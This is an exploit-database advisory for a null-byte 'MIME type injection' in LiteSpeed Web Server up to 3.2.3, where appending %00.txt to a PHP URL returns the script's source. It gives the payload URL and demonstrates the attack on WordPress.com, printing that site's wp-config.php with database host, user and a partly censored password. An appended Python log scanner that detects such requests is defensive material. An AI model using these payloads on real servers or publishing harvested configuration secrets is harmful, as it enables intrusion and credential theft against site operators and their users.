0day.today - Biggest Exploit Database in the World.
LiteSpeed Web Server <= 3.2.3 Remote Source Code Disclosure Vuln
================================================================

TheDefaced.org
TheDefaced Security Team Presents An 0-day.
LiteSpeed Remote Mime Type Injection
Discovered by: Tr3mbl3r
Shouts to his kitty kats and tacos.

########################################################################

Product:
    LiteSpeed. Discovered in <= 3.2.3; should work in all other versions below.

Vuln:
    Remote Mime Type Injection

Description:
    LiteSpeed will parse a URL's/file's MIME type incorrectly when given a null byte.

Patch:
    Upgrade to LiteSpeed 3.2.4, which has just been released today.
    9:15AM PST OCT 22. When I wrote this it's now 9:30AM PST OCT 22.

    This vuln was found before an update was released; they fixed it after they found it in their logs.

Risk: Extremely High

########################################################################

Example:
    Basically, if you had a URL like so: http://www.site.com/index.php
    and you wanted this website's source, you could simply add a null byte and an extension,
    like so: http://www.site.com/index.php%00.txt
    LiteSpeed would then at this point assume the file is a txt file.

    Keep in mind that this vuln is Mime Type Injection... so it works with any type.
    Like if you did %00.rar it would assume the index.php was a rar file.
    There's a numerous amount of things you could do.

    As to why LiteSpeed does this, it is not confirmed by us just yet.

    I assume it has something to do with MIME type handling, thus the name of the exploit:
    MimeType Injection.

########################################################################

An example of this vuln being put into use.

The following is WordPress.com's wp-config.php:
http://wordpress.com/wp-config.php%00.txt

    <?php

    // This is probably useless?
    define('DB_NAME', 'wpmu'); // The name of the database
    define('DB_USER', 'wpmu'); // Your MySQL username
    define('DB_PASSWORD', 'JTO5T**CENSOR-HERE**'); // ...and password
    define('DB_HOST', 'two.wordpress.com'); // 99% chance you won't need to change this value

    require('define.php');

    require(ABSPATH . 'wpmu-settings.php');

    ?>

########################################################################

0day.today [2024-11-14]
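
The advisory says the vendor spotted these requests in their logs, so an access-log check is the natural defensive counterpart. The following is an added example, not part of the original advisory: it scans Common Log Format lines for an encoded NUL byte in the request path and reports whether a script was the target and whether the server answered 200. The sample log lines, the SCRIPT_EXTS list and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request target and status fields of a Common/Combined Log Format line.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Assumption: extensions the server normally hands to an interpreter.
SCRIPT_EXTS = (".php", ".phtml", ".pl", ".cgi")

# Constructed sample log lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:09:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:09:00:05 +0000] "GET /index.php%00.txt HTTP/1.1" 200 1432
198.51.100.7 - - [01/Jan/2024:09:00:09 +0000] "GET /wp-config.php%2500.txt HTTP/1.1" 404 210
203.0.113.4 - - [01/Jan/2024:09:00:12 +0000] "GET /img/logo.png%00.rar HTTP/1.1" 200 900
"""

def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded NUL (%2500) is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(line):
    """Return None for a clean line, else details of the NUL-byte request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Only the path matters here; drop the query string before decoding.
    path = decode_fully(m.group("target").split("?", 1)[0])
    if "\x00" not in path:
        return None
    real, _, suffix = path.partition("\x00")
    return {
        "client": line.split(" ", 1)[0],
        "file": real,               # path before the NUL (the file requested)
        "injected_suffix": suffix,  # extension appended after the NUL
        "script_source_risk": real.lower().endswith(SCRIPT_EXTS),
        "served": m.group("status") == "200",  # 200 means content was returned
    }

def find_nul_requests(log_text):
    """Return one dict per log line whose request path contains a NUL byte."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in find_nul_requests(SAMPLE_LOG):
        print(hit)
```

Hits where both script_source_risk and served are true are the ones to triage first, since any secrets in those files should be treated as exposed.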